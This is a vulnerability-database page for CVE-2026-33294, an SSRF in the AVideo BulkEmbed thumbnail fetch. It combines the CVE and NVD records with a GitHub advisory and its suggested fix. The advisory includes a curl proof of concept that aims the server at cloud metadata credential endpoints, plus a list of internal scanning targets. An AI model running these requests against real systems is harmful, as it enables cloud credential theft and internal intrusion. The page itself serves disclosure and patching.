Vulnerability-Lookup

CVE-2026-33294 (GCVE-0-2026-33294)

Vulnerability from cvelistv5 – Published: 2026-03-22 16:58 – Updated: 2026-03-25 13:50

Title

AVideo has SSRF in BulkEmbed Thumbnail Fetch that Allows Reading Internal Network Resources

Summary

WWBN AVideo is an open source video platform. Prior to version 26.0, the BulkEmbed plugin's save endpoint (`plugin/BulkEmbed/save.json.php`) fetches user-supplied thumbnail URLs via `url_get_contents()` without SSRF protection. Unlike all six other URL-fetching endpoints in AVideo that were hardened with `isSSRFSafeURL()`, this code path was missed. An authenticated attacker can force the server to make HTTP requests to internal network resources and retrieve the responses by viewing the saved video thumbnail. Version 26.0 fixes the issue.

Severity ?

5 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N

CWE

CWE-918 - Server-Side Request Forgery (SSRF)

Assigner

GitHub_M

References

URL

Tags

	https://github.com/WWBN/AVideo/security/advisorie…	x_refsource_CONFIRM
	https://github.com/WWBN/AVideo/commit/4589a3a089b…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	WWBN	AVideo	Affected: < 26.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-33294",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-25T13:50:07.643775Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-25T13:50:25.707Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "AVideo",
          "vendor": "WWBN",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 26.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "WWBN AVideo is an open source video platform. Prior to version 26.0, the BulkEmbed plugin\u0027s save endpoint (`plugin/BulkEmbed/save.json.php`) fetches user-supplied thumbnail URLs via `url_get_contents()` without SSRF protection. Unlike all six other URL-fetching endpoints in AVideo that were hardened with `isSSRFSafeURL()`, this code path was missed. An authenticated attacker can force the server to make HTTP requests to internal network resources and retrieve the responses by viewing the saved video thumbnail. Version 26.0 fixes the issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-918",
              "description": "CWE-918: Server-Side Request Forgery (SSRF)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-22T16:58:09.664Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/WWBN/AVideo/security/advisories/GHSA-66cw-h2mj-j39p",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-66cw-h2mj-j39p"
        },
        {
          "name": "https://github.com/WWBN/AVideo/commit/4589a3a089baf4ea439481f5088b38a8aa9c82b6",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/WWBN/AVideo/commit/4589a3a089baf4ea439481f5088b38a8aa9c82b6"
        }
      ],
      "source": {
        "advisory": "GHSA-66cw-h2mj-j39p",
        "discovery": "UNKNOWN"
      },
      "title": "AVideo has SSRF in BulkEmbed Thumbnail Fetch that Allows Reading Internal Network Resources"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-33294",
    "datePublished": "2026-03-22T16:58:09.664Z",
    "dateReserved": "2026-03-18T18:55:47.427Z",
    "dateUpdated": "2026-03-25T13:50:25.707Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-33294",
      "date": "2026-04-25",
      "epss": "0.00011",
      "percentile": "0.01526"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-33294\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-22T17:17:09.100\",\"lastModified\":\"2026-03-24T21:14:36.193\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"WWBN AVideo is an open source video platform. Prior to version 26.0, the BulkEmbed plugin\u0027s save endpoint (`plugin/BulkEmbed/save.json.php`) fetches user-supplied thumbnail URLs via `url_get_contents()` without SSRF protection. Unlike all six other URL-fetching endpoints in AVideo that were hardened with `isSSRFSafeURL()`, this code path was missed. An authenticated attacker can force the server to make HTTP requests to internal network resources and retrieve the responses by viewing the saved video thumbnail. Version 26.0 fixes the issue.\"},{\"lang\":\"es\",\"value\":\"WWBN AVideo es una plataforma de video de c\u00f3digo abierto. Antes de la versi\u00f3n 26.0, el endpoint de guardado del plugin BulkEmbed (\u0027plugin/BulkEmbed/save.json.php\u0027) obtiene URLs de miniaturas proporcionadas por el usuario a trav\u00e9s de \u0027url_get_contents()\u0027 sin protecci\u00f3n SSRF. A diferencia de los otros seis endpoints de obtenci\u00f3n de URLs en AVideo que fueron reforzados con \u0027isSSRFSafeURL()\u0027, esta ruta de c\u00f3digo fue omitida. Un atacante autenticado puede forzar al servidor a realizar solicitudes HTTP a recursos de red internos y recuperar las respuestas al ver la miniatura del video guardado. La versi\u00f3n 26.0 corrige el problema.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N\",\"baseScore\":5.0,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.1,\"impactScore\":1.4},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N\",\"baseScore\":4.3,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":1.4}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-918\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"26.0\",\"matchCriteriaId\":\"B468F0CE-E5E7-4607-BD15-B5763C47493E\"}]}]}],\"references\":[{\"url\":\"https://github.com/WWBN/AVideo/commit/4589a3a089baf4ea439481f5088b38a8aa9c82b6\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/WWBN/AVideo/security/advisories/GHSA-66cw-h2mj-j39p\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"cna\": {\"title\": \"AVideo has SSRF in BulkEmbed Thumbnail Fetch that Allows Reading Internal Network Resources\", \"problemTypes\": [{\"descriptions\": [{\"cweId\": \"CWE-918\", \"lang\": \"en\", \"description\": \"CWE-918: Server-Side Request Forgery (SSRF)\", \"type\": \"CWE\"}]}], \"metrics\": [{\"cvssV3_1\": {\"attackComplexity\": \"LOW\", \"attackVector\": \"NETWORK\", \"availabilityImpact\": \"NONE\", \"baseScore\": 5, \"baseSeverity\": \"MEDIUM\", \"confidentialityImpact\": \"LOW\", \"integrityImpact\": \"NONE\", \"privilegesRequired\": \"LOW\", \"scope\": \"CHANGED\", \"userInteraction\": \"NONE\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N\", \"version\": \"3.1\"}}], \"references\": [{\"name\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-66cw-h2mj-j39p\", \"tags\": [\"x_refsource_CONFIRM\"], \"url\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-66cw-h2mj-j39p\"}, {\"name\": \"https://github.com/WWBN/AVideo/commit/4589a3a089baf4ea439481f5088b38a8aa9c82b6\", \"tags\": [\"x_refsource_MISC\"], \"url\": \"https://github.com/WWBN/AVideo/commit/4589a3a089baf4ea439481f5088b38a8aa9c82b6\"}], \"affected\": [{\"vendor\": \"WWBN\", \"product\": \"AVideo\", \"versions\": [{\"version\": \"\u003c 26.0\", \"status\": \"affected\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-22T16:58:09.664Z\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"WWBN AVideo is an open source video platform. Prior to version 26.0, the BulkEmbed plugin\u0027s save endpoint (`plugin/BulkEmbed/save.json.php`) fetches user-supplied thumbnail URLs via `url_get_contents()` without SSRF protection. Unlike all six other URL-fetching endpoints in AVideo that were hardened with `isSSRFSafeURL()`, this code path was missed. An authenticated attacker can force the server to make HTTP requests to internal network resources and retrieve the responses by viewing the saved video thumbnail. Version 26.0 fixes the issue.\"}], \"source\": {\"advisory\": \"GHSA-66cw-h2mj-j39p\", \"discovery\": \"UNKNOWN\"}}, \"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-33294\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-25T13:50:07.643775Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-25T13:50:22.378Z\"}}]}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-33294\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"state\": \"PUBLISHED\", \"assignerShortName\": \"GitHub_M\", \"dateReserved\": \"2026-03-18T18:55:47.427Z\", \"datePublished\": \"2026-03-22T16:58:09.664Z\", \"dateUpdated\": \"2026-03-25T13:50:25.707Z\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-33294

Vulnerability from fkie_nvd - Published: 2026-03-22 17:17 - Updated: 2026-03-24 21:14

Severity ?

5.0 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
4.3 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/WWBN/AVideo/commit/4589a3a089baf4ea439481f5088b38a8aa9c82b6	Patch
	security-advisories@github.com	https://github.com/WWBN/AVideo/security/advisories/GHSA-66cw-h2mj-j39p	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	wwbn	avideo	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "B468F0CE-E5E7-4607-BD15-B5763C47493E",
              "versionEndExcluding": "26.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "WWBN AVideo is an open source video platform. Prior to version 26.0, the BulkEmbed plugin\u0027s save endpoint (`plugin/BulkEmbed/save.json.php`) fetches user-supplied thumbnail URLs via `url_get_contents()` without SSRF protection. Unlike all six other URL-fetching endpoints in AVideo that were hardened with `isSSRFSafeURL()`, this code path was missed. An authenticated attacker can force the server to make HTTP requests to internal network resources and retrieve the responses by viewing the saved video thumbnail. Version 26.0 fixes the issue."
    },
    {
      "lang": "es",
      "value": "WWBN AVideo es una plataforma de video de c\u00f3digo abierto. Antes de la versi\u00f3n 26.0, el endpoint de guardado del plugin BulkEmbed (\u0027plugin/BulkEmbed/save.json.php\u0027) obtiene URLs de miniaturas proporcionadas por el usuario a trav\u00e9s de \u0027url_get_contents()\u0027 sin protecci\u00f3n SSRF. A diferencia de los otros seis endpoints de obtenci\u00f3n de URLs en AVideo que fueron reforzados con \u0027isSSRFSafeURL()\u0027, esta ruta de c\u00f3digo fue omitida. Un atacante autenticado puede forzar al servidor a realizar solicitudes HTTP a recursos de red internos y recuperar las respuestas al ver la miniatura del video guardado. La versi\u00f3n 26.0 corrige el problema."
    }
  ],
  "id": "CVE-2026-33294",
  "lastModified": "2026-03-24T21:14:36.193",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 5.0,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "NONE",
          "privilegesRequired": "LOW",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.1,
        "impactScore": 1.4,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 4.3,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "NONE",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 1.4,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2026-03-22T17:17:09.100",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/WWBN/AVideo/commit/4589a3a089baf4ea439481f5088b38a8aa9c82b6"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-66cw-h2mj-j39p"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-918"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-66CW-H2MJ-J39P

Vulnerability from github – Published: 2026-03-19 17:12 – Updated: 2026-03-25 18:34

Summary

AVideo Affected by SSRF in BulkEmbed Thumbnail Fetch Allows Reading Internal Network Resources

Details

Summary

The BulkEmbed plugin's save endpoint (plugin/BulkEmbed/save.json.php) fetches user-supplied thumbnail URLs via url_get_contents() without SSRF protection. Unlike all six other URL-fetching endpoints in AVideo that were hardened with isSSRFSafeURL(), this code path was missed. An authenticated attacker can force the server to make HTTP requests to internal network resources and retrieve the responses by viewing the saved video thumbnail.

Details

When saving bulk-embedded videos, user-supplied thumbnail URLs from $_POST['itemsToSave'][x]['thumbs'] flow directly into url_get_contents() with no SSRF validation:

plugin/BulkEmbed/save.json.php:68-105

foreach ($_POST['itemsToSave'] as $value) {
    foreach ($value as $key => $value2) {
        $value[$key] = xss_esc($value2);  // HTML entity encoding — irrelevant for SSRF
    }
    // ...
    $poster = Video::getPathToFile("{$paths['filename']}.jpg");
    $thumbs = $value['thumbs'];              // ← attacker-controlled URL
    if (!empty($thumbs)) {
        $contentThumbs = url_get_contents($thumbs);  // ← fetched without SSRF check
        if (!empty($contentThumbs)) {
            make_path($poster);
            $bytes = file_put_contents($poster, $contentThumbs);  // ← response saved to disk
        }
    }
    // ...
    $videos->setStatus('a');  // ← video set to active, thumbnail publicly accessible

The url_get_contents() function internally calls isValidURLOrPath() which only validates URL format (scheme, host presence) — it does not block requests to private IPs, localhost, or cloud metadata endpoints.

All other URL-fetching endpoints are protected. The isSSRFSafeURL() function is called in: - plugin/Scheduler/Scheduler.php - plugin/LiveLinks/proxy.php (two call sites) - plugin/AI/receiveAsync.json.php - objects/aVideoEncoder.json.php - objects/aVideoEncoderReceiveImage.json.php

BulkEmbed is the only URL-fetching endpoint that was not hardened.

This is a full-read SSRF, not blind — the HTTP response body is written to disk as the video thumbnail and served to the attacker when they view the video poster image.

PoC

Prerequisites: Authenticated session with BulkEmbed permission. The onlyAdminCanBulkEmbed option defaults to true (line 41 of BulkEmbed.php), but is commonly disabled for multi-user platforms.

Step 1: Authenticate and obtain session cookie

COOKIE=$(curl -s -c - "http://avideo.local/user" \
  -d "user=testuser&pass=testpass&redirectUri=/" | grep PHPSESSID | awk '{print $NF}')

Step 2: Send BulkEmbed save request with internal URL as thumbnail

curl -s -b "PHPSESSID=$COOKIE" \
  "http://avideo.local/plugin/BulkEmbed/save.json.php" \
  -d "itemsToSave[0][title]=SSRF+Test" \
  -d "itemsToSave[0][description]=test" \
  -d "itemsToSave[0][duration]=PT1M" \
  -d "itemsToSave[0][link]=https://www.youtube.com/watch?v=dQw4w9WgXcQ" \
  -d "itemsToSave[0][thumbs]=http://169.254.169.254/latest/meta-data/iam/security-credentials/" \
  -d "itemsToSave[0][date]="

Expected response:

{"error":false,"msg":[{"video":{...},"value":{...},"videos_id":123}],"playListId":0}

Step 3: Retrieve the SSRF response from the saved thumbnail

# Extract the filename from the response, then fetch the poster image
curl -s "http://avideo.local/videos/{filename}.jpg"

The content of the internal HTTP response (e.g., AWS IAM role names from the metadata service) is returned as the image file content.

Cloud metadata example targets: - http://169.254.169.254/latest/meta-data/iam/security-credentials/ — AWS IAM role names - http://169.254.169.254/latest/meta-data/iam/security-credentials/{role} — temporary AWS credentials - http://metadata.google.internal/computeMetadata/v1/ — GCP metadata (requires header, may not work) - http://169.254.169.254/metadata/instance?api-version=2021-02-01 — Azure instance metadata

Internal network scanning: - http://10.0.0.1:8080/ — probe internal services - http://localhost:3306/ — probe local database ports

Impact

Cloud credential theft: On AWS/GCP/Azure-hosted instances, an attacker can retrieve cloud IAM credentials from the metadata service, potentially gaining access to cloud infrastructure (S3 buckets, databases, other services).
Internal network reconnaissance: Attacker can map internal network topology by probing private IP ranges and observing which requests return content vs. timeout.
Internal service data exfiltration: Any HTTP-accessible internal service (admin panels, monitoring dashboards, databases with HTTP interfaces) can have its responses exfiltrated through the thumbnail mechanism.
Scope change: The attack crosses security boundaries — from the web application into the internal network/cloud infrastructure, which is a different trust zone.

Recommended Fix

Add isSSRFSafeURL() validation before the url_get_contents() call in plugin/BulkEmbed/save.json.php, consistent with all other URL-fetching endpoints:

    $thumbs = $value['thumbs'];
    if (!empty($thumbs)) {
        if (!isSSRFSafeURL($thumbs)) {
            _error_log("BulkEmbed: SSRF protection blocked thumbnail URL: " . $thumbs);
            continue;
        }
        $contentThumbs = url_get_contents($thumbs);
        if (!empty($contentThumbs)) {
            make_path($poster);
            $bytes = file_put_contents($poster, $contentThumbs);
            _error_log("thumbs={$thumbs} poster=$poster bytes=$bytes strlen=" . strlen($contentThumbs));
        } else {
            _error_log("ERROR thumbs={$thumbs} poster=$poster");
        }
    }

Severity ?

5.0 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "25.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33294"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-19T17:12:13Z",
    "nvd_published_at": "2026-03-22T17:17:09Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nThe BulkEmbed plugin\u0027s save endpoint (`plugin/BulkEmbed/save.json.php`) fetches user-supplied thumbnail URLs via `url_get_contents()` without SSRF protection. Unlike all six other URL-fetching endpoints in AVideo that were hardened with `isSSRFSafeURL()`, this code path was missed. An authenticated attacker can force the server to make HTTP requests to internal network resources and retrieve the responses by viewing the saved video thumbnail.\n\n## Details\n\nWhen saving bulk-embedded videos, user-supplied thumbnail URLs from `$_POST[\u0027itemsToSave\u0027][x][\u0027thumbs\u0027]` flow directly into `url_get_contents()` with no SSRF validation:\n\n**`plugin/BulkEmbed/save.json.php:68-105`**\n```php\nforeach ($_POST[\u0027itemsToSave\u0027] as $value) {\n    foreach ($value as $key =\u003e $value2) {\n        $value[$key] = xss_esc($value2);  // HTML entity encoding \u2014 irrelevant for SSRF\n    }\n    // ...\n    $poster = Video::getPathToFile(\"{$paths[\u0027filename\u0027]}.jpg\");\n    $thumbs = $value[\u0027thumbs\u0027];              // \u2190 attacker-controlled URL\n    if (!empty($thumbs)) {\n        $contentThumbs = url_get_contents($thumbs);  // \u2190 fetched without SSRF check\n        if (!empty($contentThumbs)) {\n            make_path($poster);\n            $bytes = file_put_contents($poster, $contentThumbs);  // \u2190 response saved to disk\n        }\n    }\n    // ...\n    $videos-\u003esetStatus(\u0027a\u0027);  // \u2190 video set to active, thumbnail publicly accessible\n```\n\nThe `url_get_contents()` function internally calls `isValidURLOrPath()` which only validates URL format (scheme, host presence) \u2014 it does **not** block requests to private IPs, localhost, or cloud metadata endpoints.\n\n**All other URL-fetching endpoints are protected.** The `isSSRFSafeURL()` function is called in:\n- `plugin/Scheduler/Scheduler.php`\n- `plugin/LiveLinks/proxy.php` (two call sites)\n- `plugin/AI/receiveAsync.json.php`\n- `objects/aVideoEncoder.json.php`\n- `objects/aVideoEncoderReceiveImage.json.php`\n\nBulkEmbed is the only URL-fetching endpoint that was not hardened.\n\n**This is a full-read SSRF**, not blind \u2014 the HTTP response body is written to disk as the video thumbnail and served to the attacker when they view the video poster image.\n\n## PoC\n\n**Prerequisites:** Authenticated session with BulkEmbed permission. The `onlyAdminCanBulkEmbed` option defaults to `true` (line 41 of `BulkEmbed.php`), but is commonly disabled for multi-user platforms.\n\n**Step 1: Authenticate and obtain session cookie**\n\n```bash\nCOOKIE=$(curl -s -c - \"http://avideo.local/user\" \\\n  -d \"user=testuser\u0026pass=testpass\u0026redirectUri=/\" | grep PHPSESSID | awk \u0027{print $NF}\u0027)\n```\n\n**Step 2: Send BulkEmbed save request with internal URL as thumbnail**\n\n```bash\ncurl -s -b \"PHPSESSID=$COOKIE\" \\\n  \"http://avideo.local/plugin/BulkEmbed/save.json.php\" \\\n  -d \"itemsToSave[0][title]=SSRF+Test\" \\\n  -d \"itemsToSave[0][description]=test\" \\\n  -d \"itemsToSave[0][duration]=PT1M\" \\\n  -d \"itemsToSave[0][link]=https://www.youtube.com/watch?v=dQw4w9WgXcQ\" \\\n  -d \"itemsToSave[0][thumbs]=http://169.254.169.254/latest/meta-data/iam/security-credentials/\" \\\n  -d \"itemsToSave[0][date]=\"\n```\n\n**Expected response:**\n\n```json\n{\"error\":false,\"msg\":[{\"video\":{...},\"value\":{...},\"videos_id\":123}],\"playListId\":0}\n```\n\n**Step 3: Retrieve the SSRF response from the saved thumbnail**\n\n```bash\n# Extract the filename from the response, then fetch the poster image\ncurl -s \"http://avideo.local/videos/{filename}.jpg\"\n```\n\nThe content of the internal HTTP response (e.g., AWS IAM role names from the metadata service) is returned as the image file content.\n\n**Cloud metadata example targets:**\n- `http://169.254.169.254/latest/meta-data/iam/security-credentials/` \u2014 AWS IAM role names\n- `http://169.254.169.254/latest/meta-data/iam/security-credentials/{role}` \u2014 temporary AWS credentials\n- `http://metadata.google.internal/computeMetadata/v1/` \u2014 GCP metadata (requires header, may not work)\n- `http://169.254.169.254/metadata/instance?api-version=2021-02-01` \u2014 Azure instance metadata\n\n**Internal network scanning:**\n- `http://10.0.0.1:8080/` \u2014 probe internal services\n- `http://localhost:3306/` \u2014 probe local database ports\n\n## Impact\n\n- **Cloud credential theft:** On AWS/GCP/Azure-hosted instances, an attacker can retrieve cloud IAM credentials from the metadata service, potentially gaining access to cloud infrastructure (S3 buckets, databases, other services).\n- **Internal network reconnaissance:** Attacker can map internal network topology by probing private IP ranges and observing which requests return content vs. timeout.\n- **Internal service data exfiltration:** Any HTTP-accessible internal service (admin panels, monitoring dashboards, databases with HTTP interfaces) can have its responses exfiltrated through the thumbnail mechanism.\n- **Scope change:** The attack crosses security boundaries \u2014 from the web application into the internal network/cloud infrastructure, which is a different trust zone.\n\n## Recommended Fix\n\nAdd `isSSRFSafeURL()` validation before the `url_get_contents()` call in `plugin/BulkEmbed/save.json.php`, consistent with all other URL-fetching endpoints:\n\n```php\n    $thumbs = $value[\u0027thumbs\u0027];\n    if (!empty($thumbs)) {\n        if (!isSSRFSafeURL($thumbs)) {\n            _error_log(\"BulkEmbed: SSRF protection blocked thumbnail URL: \" . $thumbs);\n            continue;\n        }\n        $contentThumbs = url_get_contents($thumbs);\n        if (!empty($contentThumbs)) {\n            make_path($poster);\n            $bytes = file_put_contents($poster, $contentThumbs);\n            _error_log(\"thumbs={$thumbs} poster=$poster bytes=$bytes strlen=\" . strlen($contentThumbs));\n        } else {\n            _error_log(\"ERROR thumbs={$thumbs} poster=$poster\");\n        }\n    }\n```",
  "id": "GHSA-66cw-h2mj-j39p",
  "modified": "2026-03-25T18:34:10Z",
  "published": "2026-03-19T17:12:13Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-66cw-h2mj-j39p"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33294"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/commit/4589a3a089baf4ea439481f5088b38a8aa9c82b6"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "AVideo Affected by SSRF in BulkEmbed Thumbnail Fetch Allows Reading Internal Network Resources"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-33294 (GCVE-0-2026-33294)

FKIE_CVE-2026-33294

GHSA-66CW-H2MJ-J39P

Summary

Details

PoC

Impact

Recommended Fix

Tags

Sightings

Nomenclature